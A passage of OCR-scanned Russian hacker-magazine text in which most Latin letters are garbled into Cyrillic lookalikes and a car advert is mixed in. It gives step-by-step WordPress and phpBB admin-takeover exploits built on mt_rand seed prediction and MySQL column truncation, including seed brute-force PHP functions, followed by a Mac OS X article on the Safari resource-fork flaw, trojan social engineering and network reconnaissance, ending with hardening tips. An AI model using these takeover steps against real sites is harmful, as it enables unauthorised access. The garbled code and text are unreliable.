• ІіПхк / /гз.2Ог.пэгпб/згіііс1бз/ог0сІ8кз.2ѵѵэсгп-з1ііс]ішпѵс-с1ііз1э.-ѵ-о]іс 

— исследование гагОг’а на тему предсказуемости случайных чисел 
вті_гапс10 

• Ьир : / /гагОг.пате /ѴиІпегаЬіІіІіез /заі-соіитп-ігипсаііоп-зесигііѵ 

— исследование гагОг’а на тему усечения данных в МуЗС^Ь 

• Ьар : / /гагОг.пате /агіісіез / таеіѵа-зІисЬаіпѵх-сЫзеІ-сЬазс-2 

— исследование гагОг’а на тему предсказуемости случайных чисел 
вгапсІО 

• Ьар : / /гагОг.пате /ѴиІпегаЬіІіІіез / иѵагѵітозіі-ѵ-зітрІе-тасЬіпез- 
Гогиш — уязвимости 8МР на основе предсказуемости случайных 
чисел 



2. Если запрос вернул более 30 результатов поиска, то смотрим 
Ыті- исходи и к страницы. В ссылке на следующую страницу форум 
должен вывести случайное число в параметре зеагсбщій, — запо- 
минаем его; 

3. Запускаем брутфорс по найденному псевдослучайному числу из 
зеагсбщій для определения изначального веесі. Для этого гагОг 
предлагает функцию - 

бипсбіоп веагсЬ_зеей ( $гапй_пит) { 

$тах = 1000000; 

бог ( $зеей=0 ; $зеей<=$тах; $зеей++ ) { 
тб_згапй($веей) ; 

$кеу = тб_гапй ( ) ; 

іб ( $кеу==$гапй_тлп) гебигп $зеей; 

> 

гебигп. баізе; 

} 

4.3апускаем тб_згапй() с полученным значением зеей и отбрасы- 
ваем первоечисло — тот самый зеагсЬ_ій; 

5. В том же кеер-а Ііѵе соединении отправляем запрос на смену пароля 
админа блога; 

6. На основе полученного сида генерируем случайное число для акти- 
вационного ключа смены пароля, который блог должен был выслать на 
мыло админа; 

7. Снова все втом же кеер-аііѵе соединении переходим по сгенери- 
рованной эксплойтом активационной ссылке. Это должно привести к 
смене пароля администратора; 

3. Генерируем пароль той же функцией, с помощью которой 
получили активационный ключ, и заходим в админскую часть 
ѴѴогсІРгевв :]. Кстати, если на сервере-жертве стоит РНР 4 или 
РНР 5 <= 5.2.0, то желательно генерировать псевдослучайные 
числа на той же версии РНР; то же самое относится 
и к РНР 5 >= 5.2.1. 

Эксплойт, основанный на этом алгоритме, написал всетотже гагОг 
Ссылку смотри во врезке. 



► обо 
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Поискв рНрВВ2 



Н СНОВА ѴѴ0КРРКЕ55 

Попробуем подойти копи санной уязвимости с другой стороны и рас- 
смотреть последний эксплойт для ѴѴогсІРгевв, названный ѴѴогбргевв 
2.6.1 (БСИ-СоІитпТгипсаііоп) Абтіп Такеоѵег Ехріоіб. Алгоритм экс- 
плойта основан сразу на двух глобальных уязвимостях: на, собственно, 
предсказуемости псевдослучайных чисел и на 50І_СоІитпТгипса(іоп 
— усечении данных в Му5С!І_. 

Сделаю небольшое отступление и расскажу об этом пресловутом усече- 
нии данных в мускуле. Уже известный тебе Стефан Эссер опубликовал в 
своем блоге очередную асіѵівогу, посвященную новой уязвимости. Она 
связана с особенностями сравнения строки а втомати веского усечения 
данных в Му5С1І_. Известно, что любой столбец в таблице имеет опреде- 
ленную длину. Допустим, существует поле ѵагсбаг(бО) (как в ѴѴогсІРгевв 
<=2.6.1 для логина пользователя). Что будет, если записать в это поле 
любое значение, которое превыситобозначенные 60 символов?Лиш- 
ние символы отсекутся! В поле останутся первые 60 символов, которые 
мы попыталисьтуда записать. Дальше. Если у нас есть поле в базе 
данных со значением «абтіп», и мы попытаемся сравнить это значение, 
например, с «абтіп » (абтіп и 2 пробела), то мускул это проделает и 
скажет, что поля равны. Эта особенность Му50І_ работает в дефолтной 
конфигурации, — что открывает новый вектор атаки на веб-приложения! 
Подробнее о уязвимости советую прочитать по адресам, указанным в 
сноске. Но вернемся к нашему эксплойту. 

Принцип его работы изложен ниже: 

1. Регистрируем нового пользователя слогином абтіп[55 пробелов]х. 
Далее конечный символ «х» отсекается, и в базе мы получаем пользо- 
вателя абтіп с 55 пробелами, что для мускула фактически будет равно 
простологину«асІтіп»; 

2. Запрашиваем линк сброса пароля на свое мыло и получаем уни- 
кальный ключ из параметра кеу, который был сгенерирован функцией 

тб_гапй ( ) : 

3. Сбрасываем па роль администратора с полученным ключом. В итоге, 
новый па роль уйдет только на мыло админа; 

4. На основе полученного ранее ключа ищем си д для вновь сгенериро- 
ванного пароля. Тут можно сгенерировать гаіпбо\л/-таблицы для поиска, 
которые будут весить примерно 4294967296 (строк, возможных значений 
сида, номер строки=веесІ) * 20 (количество символов кея для смены 
пароля) = 85899345920 байт или 80 гигабайт. Для версий РНР4, РНР5 
<=5.2.0 и РНР 5 >=5.2.1 нужно генерировать отдельные табл и цы. В экс- 
плойте также есть возможность искать 5еесІ и без применения радужных 
таблиц, но процессзайметочень долгое время. Делается это следующей 
функцией: 

бипсбіоп дебзеей ( $гезебкеу ) { 

есЬо " [-] саісиіабіпд гапй зеей Тог $гезебкеу (бМз 
мііі баке а Іооопд біте) " ; 

$тах = рои (2, (32-ВТГБОУ) ) ; 

Тог ( $х=0 ; $х<=$тах; $х++) { 

$зеей = ВНЕСУ ? ($х « 1) +1 : $х; 
тб_згапй ( $зеей) ; 

$безбкеу = ир_депегабе_раззиогй (20 , Таізе) ; 




ѴѴОІШРКЕЗБ 
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ІТ ( $безбкеу==$гезебкеу ) { 
есбю " о\п" ; гебигп $зеей; 



ІТ ( I ( $х % 10000) ) есбю " . " ; 



есЬо " \п" ; 
гебигп Таізе; 



} 



Параметр ВІІ66У — не что иное, каквышеописанный баг, когда 26 пос- 
ледних бит сида становятся равными нулю, то есть число всех значений 
для перебора будет равным 2 в 31 степени. Вычисляется важность 
генератора так: 

тб_згапй(2) ; $а = тб_гапй() ; тб_згапй(3) ; $Ь = тб_ 
гапй ( ) ; 

йеТіпе ( 'ВШЕУ , $а == $Ь) ; 



Изучив исходник этого эксплойта, ты сможешь более подробно вникнуть 
в суть уязвимостей, найденных Втефаном Эссером. 

Пока что эксплойты на вышеописанных багах не очень распростра- 
нены. Я думаю, это из-за того, что для многих эксплуатация уяз- 
вимостей генераторов псевдослучайных чисел может показаться 
чересчур сложной. На самом деле, это не так. Хакеру я посоветовал 
бы изучить исходники эксплойтов, ссылки на которые есть в сноске, 
и написать на основе полученной информации свои мегапробив- 
ные релизы. А для админов и просто юзеров — обновить свой РНР 
до последней версии и поставить ЭиЬовіп-патч от Втефана Эссера. 
Вооб [иск! ЗС 
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Самое уязвимое место в любой системе — это плохо разобравшийся в 
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ней пользователь. Ни один, даже самый хитроумный, эксплойт не наделал 
столько бед, сколько наивная вера людей, что кто-то прислал им фото голой 
Курниковой. Хорошо подготовившийся юзер способен привести типичный 
офисный ПК в неработоспособное состояние в среднем за 15-20 минут не 
очень интенсивного веб-серфинга. И МасОЗ X здесь не исключение. 



омпьютерная безопасность представляет собой извест- 
ную «уловку-22»: чем хитроумнее и надежнее механизм 
защиты, тем больше вероятность, что он будет моментально 
отключен. Сложные пароли быстрее попадают на бумажку, 
открываемые по снимку сетчатки двери сразуже подпираюттабуретом 
(не напасешься сетчатки все время открывать-закрывать). Чем полезнее 
становится встроенный файрвол ѴѴІпсІоѵѵв.тем быстрее его отключит 
сдавшийся пользователь, не сумевший заставить программу пропускать 
торренты с голыми фото Курниковой. 

В общем, надежность компьютерной системы — на протяжении некото- 
рого отрезка времени — будет оставаться примерно одинаковой, сколько 
бы усилий не было предпринято для ее компрометации или, наоборот, 
сколько бы строгих специалистов не было бы брошено на ее защиту. 

Если междухакером и инженером сидит живой человекизтеплого мяса, 



с руками, ногами и всем таким — он будет брать на себя роль буфера. 
Поэтому даже в разгар самой мощной эпидемии не наступает коллапса: 
обеспокоенные пользователи активно начнут ставить патчи и пользо- 
ваться специализированными инструментами. Помнишьэпидемию 
«ІІ_оѵеѴои»? Программка для его удаления была на флешке у каждого 
второго. Каждый третий научился отключать его руками. Все выучили 
аббревиатуру КРС, некоторые даже поняли — что это такое. 

И, разумеется, если производитель начнет повышать уровень за щиты, то 
постепенно юзер расслабится — зачем напрягаться, если за тебя это уже 
сделали? Кто из нас не пользовался чудесным паролем «123456»? А как 
насчет пар типа секретного вопроса «вопрос?» и ответа «ответ» на него? А 
сколько людей используют один и тот же пароль в паре, а то и больше мест? 
Итак, слишком плохо защищенные системы заботятся о себе сами. 
Слишком хорошо защищенные — наоборот, становятся жертвой 




► 0б2 



ХАКЕР 11 /119/ 08 








ЧІР 

► — Ч> ч *Ѵ _м«. _!** 

• ш .Ішіг Ц# Щ а*і ІГ Э 

л-гН.і! иск Чіі к ■ і. 

гііТІгЛМР! Мі I I I 

•-■л‘ ііі мл ,г 1 1 

*■ 

кіш и- и хгѵ к -ті а 
р •= Ліг-иЬіх. іс 
I 4Ц**-ЧЙ \Ѵ 

шт.-я +■ ш | і 

■"ИИ « I ■ и 



Окжі |іп*1 Нгфпі ( ІІУ1П1 '* ■■< ц П4*«іщ|сѵ 
Оіп» чнііЬіп Йч 



'■ч ,:р II Ьй *т»і І 'Е~ «И. ■(.’ 4. «±г. 



А 



Обрати внимание на галочку напротив Ореп «ваіеябіев. 2008 год. Для 
макюзеров по-прежнему существуют «безопасные» файлы 



Утилита Опв-всІ найдет все, прямо как Яндекс 



собственной защиты. Это на удивление тонкий, даже деликатный 
баланс, на котором строится практически вся индустрия инфор- 
мационной безопасности. Лучшая защита —та, которая отнимету 
пользователя ровно столько удобства, сколько он готов отдать за 
названное количество трудностей, причиненное... компьютерному 
энтузиасту, заинтересовавшемуся его данными. О любом срединном 
случае лучше всего судить по соответствующим ему случаям край- 
ним. Представь компьютерную систему, пользователи которой не 
испытывают ни малейших проблем с безопасностью. Даже если они 
не новички, а профессиональные пользователи — что произойдет? 
Рано или поздно ребята ста нут та к беспечны, что начнут притяги- 
вать неприятности прямо из воздуха. Мир жесток и на 3/4 покрыт 
холодной, соленой водой, а потому систем, пользователи которых 
не заботились бы о безопасности вовсе (и при этом не получали бы 
ответного пинка] не существует... Кроме, разумеется, пользователей 
Мае 05 X. 



В НЕМНОГО ПОЧТЕНИЯ 

Как среди макюзеров, пусть нечасто, но встречаются умудренные века- 
ми, убеленные люминесцентным офисным освещением, после завтрака 
и душа похожие на Столлмана, II N IX- гуру, та к и сама Мае 08Х не столь 
проста, как кажется. Это очень, очень старая система. Кажется, я об 
этом уже говорил — на этих же страницах, некоторое время назад? Та к 
вот, моложе она с тех пор не стала. Тут не «ядро РгееВ50 с графической 
оболочкой», как считают неграмотные люди, а основанная на ядре МасЬ 
операционная система с собственной богатой историей, традициями, 
собственными шизофрениями и не разрешаемыми по двадцатьлет 
багами. Начало свое она берет от ЫехіВіер 0.9, которая была выпущена в 
далеком 1 988 году. 

Конечно, 1988 год — нетакужи далек от нас, но представьте, что и тогда 
система науди влениемалоотличаласьотнынешней Мас05Х. Этобыл 
настольный ІІІМІХс настоящей многозадачностью и всеми делами. В об- 
щем, Мае 05 X— не маргинальная система неясного назначения! У нее 
есть история, есть и цель. Инженеры Арріе по-прежнему предпочитают 
строить ее в соответствии со всеми возможными открытыми стандар- 
тами, зачастую на основе открытого ПО (начиная с Арасбе, Регі, РуіНоп 



и РиЬу и заканчивая ѴѴеЬКІІ, дсс и собственно хп и — тем самым ядром 
Масб; если бы оно было закрытым, не было бы ника кихХакинтошей). Тут 
не прямое использование чужого труда, а участие в нем, поддержка и 
совместная польза. 

Опять же, Мае 05Х не настолько идеальна, чтобы пользователи могли не 
иметь ни малейшего представления о ее работе. Все-таки, это опера- 
ционная система, а не сотканная из ветра мечта. Разработчики Мае 05 
X ступают негулко, разговаривают негромко, черты их приятны и милы, 
а лбы высоки и полны мыслей. До чего это довело их пользователей? 
Сейчас разберемся! 

В НЕМНОГО НЕПОЧТИТЕЛЬНОСТИ 

От Мае 05Х многие не в восторге, и макюзеров многие нелюбят. И 
за что наслюбить? Большинство макюзеров — вздорные мальчишки и 
девчонки, гордящиеся своими пластиковыми игрушечными компью- 
териками и телефончика ми. Конечно, Мае 05 X — система для идиотов 
(иначе бы я ею и не пользовался] и нытиков, неспособных справиться с 
настоящей мужской операционной системой. Настоящим мужикам она 
неинтересна. Настоящих мужчин интересуют машины, туристические 
походы и политика! 

Пользователи Мае 05 X пребывают — я не шучу — в счастливом неведе- 
нии о том, что в мире существуют вирусы, трояны, фишинги так далее. 
Мае 05 X находится в опасном дисбалансе — при отсутствии реальных 
(то есть видимых, осязаемых) угроз ее разработчики слишком много 
времени тратят на безопасность. 

Ну, вот кому нужны в Мае 05 X «АС Б»? Кто планировал к серверу с Мае 05 
X подключаться по протоколу Арріе Рііе Ргоіосоі, кроме кучки дизайнеров 
и верстальщиков? Зачем там промышленное шифрование всего подряд 
128-битными ключами, семикратное затирание «Корзины» случайным 
набором нулей и единиц? 

В итоге, пока всему остальному миру достаются бушующие вирусные 
эпидемии, приносящие миллионы долларов убытка... — посмотрим, что 
достается макюзерам. 

Где-то в феврале 2006 года по блогосфере прокатилась шокирующая 
новость — в 5а1агі обнаружена серьезнейшая уязвимость. Если люди 
скачивали, приняв за безобидный ЭРЕЭ, специальным образом 
подготовленный файл, он запускал Тегтіпаі.арр (приложение для 
доступа к командной строке через ВІІІ] и выполнял записанный в 
нем сценарий (на Ьазб, руІНоп, чем угодно]. Уязвимость демонстри- 
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роваласьустрашающим образом — файл скачивался и 
самостоятельно запускался! Многие испугались. 

Давай кратко разберем суть уязви мости. В Мае 05 X сущест- 
вует несколько способов определения, каким приложением 
будет открытфайл, а именно —три. 

Первый способ — незамысловатое расширение, которое 
ассоциировано с некоторым приложением по умолчанию 
[Забагі для .Ыті, ІТипев для .гпрЗ итак далее). 

Второй способ — отметка создателя,™ есть программы, в которой файл 
был создан или сохранен. При решении, что делать при запуске файла, 
этотспособ важнее предыдущего. 

Третий способ — выставленная специально для файла преференция: ка- 
ким приложением его открывать. Посмотри на скриншот. Я создал пустой 
текстовый файл рЬобоДрд, затем через 6111 ассоциировал его сТегтіпаІ. 

У него появляется новое свойство (гевоигсебэгк) — в нем хранится 
информация о том, каким приложением я желаю впредь открывать этот 
файл. Поле называется ивго (ивегорііоп), приложение — /Арріісабопв/ 
Шііібіев/Тегтіпаіарр (в ивго прописывается абсолютный путь к при- 
ложению). Файл по-прежнему определяется как ЧРЕ6. Если я запущу 
его двойным кликом — он откроется вТегтіпаІ.арр и будет исполнен. 
Ревой гее Рогк хранится непосредственно в самом файле только на томе 
с файловой системой НР5+ (системной ФС Мае 05Х). Если записать 
файл стем же ивго на том с РАТ32 или ІЮР или сжать его архиватором, не 
поддерживающим гевоигсеФгк (то есть, любым, кроме 5іиШ), он, тем не 
менее, сохранится — в виде кучки скрытых файлов и папок. Таким обра- 
зом, вилку ресурсов — и поле ивго — можно передавать с одного Мака на 
другой, поместив файл, скажем, в зір-архив. 

В веб-браузере 5эІагі есть опция — после скачивания автоматически 
открывать«безопзсные» файлы. Безопасными файлами наивная Арріе 
считает видео-, аудио-, РОР-файлы, картинки и текстовые документы, а 
также образы дисков и другие архивы. Образы дисков — это стандартный 
способ распространения ПО для Мае 05 X (файлы с расширением б тд 
(сіізк ітаде), которые по клику монтируются и относительно безопасны). 

В Мае 05Х по соображениям безопасности нетавтостарта дисков (из 
при мерно тех же соображений некоторые виды таіѵѵаге для ѴѴІпбоѵѵз 
записывают себя на ІІ5В-флешки вместе саиіозіагі.іпі). 

Собственно, уязвимость заключалась в следующем: человек скачи вал 
архив с фотографией внутри, 5абагі автоматически распаковывал архив, 
находил внутри файл, по расширению определял его тип как«изображе- 
ние формата Ф РЕѲ», и, сочтя безопасным, открывал — используя указан- 
ное приложение, /АррІісаііопв/ШШІІев/ТегтіпаІ.арр. Что, при наличии 
флага +х на файле, приводило к исполнению команд, записанных в этом 
самом файле. 

То есть, дефолтное сочетание настроек позволяло выполнять на компью- 
терах граждан практически любое количество терминальных команд 

Тем жени -ті будьтакоежелание, можно было бы наделать порядочно 
дел. И чем же все закончилось? Представь, что было бы, если бы Іпіегпеі 
Ехріогег по умолчанию автоматически открывал каждый скачанный файл 
с расширением ірд, хір или трЗ. Та к вот — не случил ось ничего! Люди 
запаниковали, потом сняли галочкусэтой самой опции в5а?агі и все. 
Некоторые спешно переместили Тегтіпаіарр куда-то еще (или вовсе 
удалили), но это была чистая паника, и смысла в поступке не было. 

Так вот. Пока я писал статью, я полез проверять — стоитли у меня эта 
галочка. Оказалось, что стоит — вдобавок, только что докачавший- 
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РІІеѴаиК надежен, кактанк, и практически не отличается от него скоростью и манев- 
ренностью при бэкапе. Увы, удобство — это цена безопасности... 



ся бтд-файл самостоятельно смонтировался, не отвлекая меня от 
текста. Компьютер совсем новый, а значит, она по сей день стоит там по 
умолчанию. Но кое-что изменилось! Я отправил файл самомусебе по 
почте, скачал — 5абагі автоматически распаковал рНоіоц'рд в мою папку 
0о\л/п1оабз, но не запустил его. Когда я сделал это сам (голые фото Кур- 
никовой!), система сообщила — рНоІоцрд можетбыть приложением, он 
был скачан из интернета и будет открыт в Терминале. Уверен ли я? 
Конечно, вожделение к Курниковой может быть безграничным и всегда 
найдутся люди, которые нажмут кнопку «О К», особенно если файл им 
пришлет кто-нибудь знакомый — но это не одно и то же... 

В ПРАКТИКА РАБОТЫ С МАКЮЗЕРОМ 

Итак, Мае 05 X, как все системы, особенно уязвима со стороны 
пользователя. Некоторые нововведения в области безопасности, 
в частности, выражаются втом, что пользователю придется читать 
всплывающие окна. Почему это имеет значение? Дело в том, что это и 
есть в действии та самая «уловка-22», о которой я так много говорил. 
Чем безопаснее пытается быть система, тем больше вовлечения 
эта безопасность требует от человека. Появление таких окошек 
нельзя отключить — но их очень легко игнорировать. Нет никакой 
возможности решить эту задачу иначе — ведь ограничивать свободу 
владельца компьютера нельзя! 

И — второе. Мае 05Х находится в крайне невыгодном положении. Не- 
большая рыночная доля лишает ее не только коммерческого внимания 

— нет никакого смысла ломиться на хорошо защищенные Маки, когда 
дырявых РС так много. Но она лишена и академического внимания: по 
различным причинам (очень нравится, очень не нравится, естьзанятия 
поинтересней) ее зачастую игнорирует элита информационной безопас- 
ности. А вот это уже плохо, потому что вселяет в инженеров и пользовате- 
лей чувство ложной безопасности. 

Третье. Это очень, очень дружелюбная система. Ее основной лозунг 

— «просто работает». Если к Маку подключить принтер, он появится в 
списке принтеров. ОС даже серийный номер не спрашивает при уста- 
новке — какой серийник, дружище, ты уже купил/купила Мак, конечно, 
тебе положена Мае 05Х, пользуйся, радуйся! Следовательно, система 
предпочитаетлишний раз не напрягать пользователя и всеми силами 
избегаетзагадочных, необъяснимых глюков (такиелюбитустраивать 
файрвол ѴѴІпбоѵѵз, например). Макюзеры быстро привыкают, что 99% 
вещей происходят самостоятельно, без ихучастия [и без их, в том 
числе, ошибок, — Прим. РогЬ). 

Что следует из этих трех пунктов? Если пользователи системы привыкли 
считать ее безопасной и не привыкли кограничениям и вопросам — зна- 
чит, всегда можно найти способ эксплуатировать именно пользователя. 
Поэтому мы сейчас пройдемся по потенциально опасным способам 
взаимодействия с системой, разберем несколько полезных пунктов, а 
затем решим — какзащитить собственный Макинтош (или Хаки нтош) от 
внимания со стороны друзей и коллег. 
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В СНОВА ВИЛКА 

Сначала кратко закончим стой самой вилкой ресурсов — Мае 05 X 10.5 
используетее для повышения безопасности системы. Еслиты решишь 
воспользоваться Заіагі, система именно в вилке ресурсов сохранит 
информацию о том, когда и откуда ты скачал этот файл. В случае обычных 
файлов (не приложений) к вилке ресурсов добавляется новое поле сот. 
арріе.диагапііпе, которое и сообщает, что файл был скачан из интернета. 
К приложениям добавляется адрес сайта. 

Конечно, файловая безопасность не ограничивается только этим, но для 
того, чтобы удалить со своего троя на запись о карантине, тебе придет- 
ся помучиться (найти ЬиЯегоѵегІІоѵѵв Ріпсіег, например). Потребуется 
досконально изучить систему — и ты рискуешь стать макюзером. 

Из этого следует — если пойдешь по этому пути, тебе, вероятно, придется 
действовать социальными методами. Тебя вполне может ждать успех 
— даже если пользователю двадцать раз показать предупреждение да 
потребовать ввести пароль (это, кстати, запросто может датьтвоему прило- 
жению привилегии рута), все равно найдется кто-то, кто сделает по-твоему. 
Конечно, социальный хакинг — скорее, искусство, чем наука. Тебе потребу- 
ется талант программиста, дизайнера, веб-дизайнера. Придется создать 
похожий на настоящий сайт, придумать способ убедить пользователей 
скачать и поста вить твое — запакованное в бтд и украшенное шикарным 
артом — приложение. А главное, тебе понадобится проникнуть в сам дух 
Мас05Х, чтобы привередливая жертва не передумала на полпути... 
Примерно год назад создали троян, который распространялся имен- 
но та к. На тематических форумах появилась куча 5Е0-ссылок (спама, 
то есть) на порносайты, которые предлагали пользователю поста- 
вить супер- мега -порнокодек (иКгасобесЮОО.сІтд) для ОиіскТіте. 
Установка шла через системный Іпзіаііег. После установки человек 
получал ОМЗСЬапдег — и дальше бедняга то л и сдавал свои пароли 
отРауРаІ, либо просто смотрел рекламу, пока не надоедало. Скачать 
цИгасобесЮОО.сІтд мне, к сожалению, не удалось — дикие версии 
троянов для ОБХдолго неживут— ноэто не должнотебя останавливать. 
Всегда найдется желающий поставить твой троян. 



Система сама предложила 5ИогІ Ыате, когда я сместил на 
него фокус. В 10.6 так будетзаполняться и поле РазвѵѵогсІ 



В БАРАШ 

Хорошо, а как насчетЗаІагі? Ведь это основной способ взаимо- 
действия пользователя с Сетью (в которой его поджидаешьты). 
Представь себе, но в Заіагі нет защиты от фишинга. Более того, в 
версии 3.1 .1 для ѴѴІ псіоѵѵз даже была возможность самостоятельно 
подменять содержимое адресной строки — так что можно было пред- 
ставляться не длиннющим (вызывающим подозрения одним только 
количеством букв) Ы Р?Б, а просто и незатейливо — еЬау.сот, раураі. 
сот, аІІаЬапк.ги... В версии 3.1 .1 лафу прикрыли. Это делает Заіагі 
последним браузером без такой функции — в Іпіегпеі Ехріогег и 
Рігеіох она давно есть. Скорее всего, скоро недостаток исправят — но 
пока можно пользоваться. 

Заіагі очень часто упоминается в различных сводках — и его открытая 
часть (ѴѴеЬКІі) и закрытая проприетарная (та часть, которая автома- 
тически запускала скрипты в терминале). Например, уязвимость в 
ІІЬШ использовалась в ІРбопе с прошивкой 1.1.1 для джейл брейка (по 
сути, исполнения произвольного кода). Закрытая недавноуязвимость 
позволяла повреждать память, предлагая пользователю зір-архивы 
со слишком длинными именами. В общем, Заіагі, особенно с момента 
выхода версии для ѴѴІпсІоѵѵв и появления ІРИопе, — объект пристального 
внимания. То, что ѴѴеЬКІі также используется в боодіе СЬгогпе, собс- 
твенном браузере ІМокіа и — зачастую — в Ерірбапу, делает его особо 
привлекательным. Вдобавок, ѴѴеЬКІі простой, маленький и еголегко 
читать, вскрывать и переделывать под себя, а опасность стать макюзе- 
ром минимальна. 

^ ОСТАЛЬНАЯ СЕТЬ 

Я не буду тебе врать — вМасО5Х10.5 по умолчанию отключен файрвол. 
Там есть встроенный файрвол, основанный на ірбѵѵ, юниксовом фильтре 
пакетов, и по дефолту он отключен. Однако по тому же самому умолчанию 
в Мае 05Х нет ни одного включенного сетевого сервиса. Каждый сервис 
пользователь должен включать самостоятельно (Зузіет Ргеіегепсев 
-> БИагіпд). РІІеЗНагіпд также содержите себе РТР и 5МВ, но их нужно 
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НЕ 



|Удали эти две строки и Воп|оиг перестанет| 
■дтрепать лишнее| 



ІІ — ч 



ІТакгезоигсеІогк хранится вгір-архиве| 






ІПоумолчанию гостю разрешено получать до- 
|ступ к папке РиЫіс, но это легко исправить^ 




> ѵѵагпіпд 

Внимание! Инфор- 
мация представлена 
исключительно с 
целью ознакомления! 
Ни автор, ни редак- 
ция за твои действия 
ответственности не 
несут! 



включать отдельно — по умолчанию протоколом доступа к 
файлам является АРР (Арріе Рііе Ргоіосоі]. Правда, веро- 
ятность того, что утвоего друга/соседа эти сервисы будут 
включены — отнюдь не нулевая: Маки обычно покупают 
в качестве второго компьютера (например, ноутбук Арріе 
с сохранением настольного РС], и 5МВ включают, чтобы 
наладить перекачку файлов туда -сюда. ѴѴеЬ ЗЬагіпд вклю- 
чает Арасбе, Зсгееп Збагіпд включает ѴІМС, Петоіе І_одіп 
включает ввбсі. 

Что ты можешь сделать с этой информацией? Во- пер- 
вых, тебе необязательно (хотя так будет проще) иметь 
Мак — достаточно І_іпих(0реп51І5Е, например); сов- 
ременные дистрибутивы включают поддержку АРР и 
тРЫЗгевропсІег, и ввб-клиенттоже. 

Тут очень важен тОМЗгевропсІег — Арріе называет его 
Вогфоиг. Это версия зегосопф активно используемая 
Арріе во всем подряд (от подключения ІТи пев к сетевым 
колонкам АігТипев до разрешения локальных доменных 
имен). Он оповеститтебя отом, что в Сети появился Мак, 
и о сервисах, которые предоставляет (также смотри мою 
статью о безопасности ІРбопе в августовском номере X, 
там все довольно подробно изложено). 

Теперь ты видишь Мак, ты видишь его ресурсы, ты видишь 
включенный біе збагіпд. Первое, что он тебе даст — под- 
ключение под гостевой записью (посмотри на скрин- 
шот — заметь, доступ гостю можно и прикрыть). Есть 
вероятность, что гостю будут доступны все внешние тома, 
подключенные к Маку и расшаренные руками (авто- 
матически и корректно шарятся только НР5+-тома). В 
гостевой папке (-/РиЫіс) тебе ничего особенно не светит 

— она доступа только для чтения. Плюс, в ней есть папка 
Эгор Вох, доступная только для записи. 

Что тебе еще удастся узнать? Ты можешь на чать угадывать 
логин пользователя. У пользователя есть полное имя (ска- 
жем, Сергей Иванов) и короткое имя [II N ІХ-л оги н) . Мае 03 
X пытается быть очень полезной и предлагает человеку, 
который ввел свое полное имя, соответствующий логин (в 
том числе, в переводе с русского). Вероятность того, что 
он согласится — высокая. Узнать полное имя тоже легко 

— система использует его для именования гостевой папки 
пользователя (Сергей Иванов'з РиЫіс РоЫег] — получить 
из этого вегдерѵапоѵ несложно. Более того, если это пер- 
вый (или вовсе единственный) пользователь на компью- 
тере, та же схема будетиспользована при его именовании 

— Сергей Иванов'вМасВооІцСегейИванов’віМаситак 
далее. Помни, что длинное и короткое имя не обязательно 
связаны. Длинное имя можно использовать при логине по 
АРР, короткое — при логине по ззб. 

А что, если при регистрации пользователь решит не 
вводить никакого пароля? После короткого предупреж- 
дения (кто же его читает!) система согласится. Тебе это 



кое-что даст — однако, не доступ по взЬ. АРР пустит тебя 
вдомашнююпапку, нонилогинповвб.нивисіо работать 
не будут (в Мае 05 X пользователь гооі отключен, и адми- 
нистративные пользователи вводят собственный пароль 
при выполнении висіо). 

Й ЗАЩИТИ СЕБЯ 

Если тебе не удалось избежать этой чумы XXI века, и ты 
все-таки стал макюзером (или поставил БеорагсІ, напри- 
мер, на М5І ѴѴІпсІ), полезно бы знать, какзащитить себя от 
любопытных исследователей. 

Смотри, есть просто очевидные вещи — пользуй- 
ся нормальным паролем, включи автоматическое 
запирание экрана при старте скринсейвера, изучи и 
пойми работу системы. Н ет никакого смысла работать 
под стандартным пользователем и регулярно пере- 
ключаться на администратора — особой разницы ты 
не заметишь (стандартному не разрешено без ввода 
пароля класть приложения в /Арріісаііопв и писать в 
корень). Но стоит включить файрвол, выключить ѴЫС 
(обойдешься ввб). 

Конечно, Вощоиг оповестит о твоем звЬ всех, кто 
находится в твоей сети — но его можно попросить и 
не делать этого. Открой для правки файл настроек 
демона, запускающего ввИсІ — висіо ѵі /ЗувІет/ЫЬгагу/ 
ЕаипсбОаетопв/ввб.рІівІ. ЭтоХМФ-файл, который 
довольно легко читать. Ты найдешь там две строки 

— «<зІгіпд>зеИ</зІгіпд>» и «<в1гіпд>в11р-ввб</в1гіпд>», 
которые собственно и сообщают Еіощоиг, какие сетевые 
сервисы представляет ввбсі, когда он запущен. Удали 
строки, перезапусти ззбсі и, вуаля, — сервис больше не 
регистрируется Вощоиг. 

Если утебя Мак, поставь пароль на ЕРІ/ОрепРігтѵѵаге 

— он не позволит загрузить его в однопользовательском 
режиме, а сбросить без вскрытия корпуса его не удастся. 
Если ты конченый параноик — для тебя в Мае 05Х есть 
кое-что особенное. Это РІІеѴэиІі, шифрование твоей 
домашней папки самым большим ключом на всем Диком 
Западе. 

То есть, вместо /Еівегв/уоигпіск у тебя будет образ диска, 
зашифрованный так надежно, что если с ним что-то слу- 
чится (или если ты забудешь пароль), то можешь попро- 
щаться со своими данными. Однако даже если злоумыш- 
ленник вы рвет у тебя сумку с ноутбуком, разломает его 
и в ыта щит жесткий диск, ни байта твоей информации 
извлечь он не сможет. 

Конечно, если ты не выключил его и в памяти содержит- 
ся что-то важное — ее можно охладитьжидким азотом, 
извлечь и исследовать на специальном оборудовании. 
Ничего не поделаешь! Компьютерная безопасность 
представляет собой настоящую «уловку-22»! ІЗС 
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НОВЫЙ СЕМИМЕСТНЫЙ ІЧІ55АМ рА5НдАІ+2 
БОЛЬШЕ МЕСТА ДЛЯ БОЛЬШОГО ГОРОДА 

• З-й ряд сидений или увеличенный объем багажного отделения 

• Система полного привода АН МСЮЕ 4x4 

• 6 подушек безопасности 

• СЭ-аудиосистема и система беспроводной связи Віиеіооій® 
для мобильного телефона с управлением на руле 

• 17-дюймовые легкосплавные диски 

• Электронная система стабилизации Е5Р 

• Рейлинги 1 




5НІРТ ТИеѵѵаууои тоѵе* 



ѵѵѵѵѵѵ. п і зза п . г и 



СЛУЖБА ПОДДЕРЖКИ КЛИЕНТОВ ( 8 800 200 59 90 I СПЕЦИАЛЬНАЯ ПРОГРАММА ДЛЯ КОРПОРАТИВНЫХ КЛИЕНТОВ I ТЕСТ-ДРАЙВ У ОФИЦИАЛЬНЫХ ДИЛЕРОВ 2 



ГАРАНТИЯ СОСТАВЛЯЕТ 3 ГОДА ИЛИ 100 000 КМ ПРОБЕГА. ГАРАНТИЯ ПРОТИВ СКВОЗНОЙ КОРРОЗИИ — 12 ЛЕТ НЕЗАВИСИМО ОТ ПРОБЕГА. 
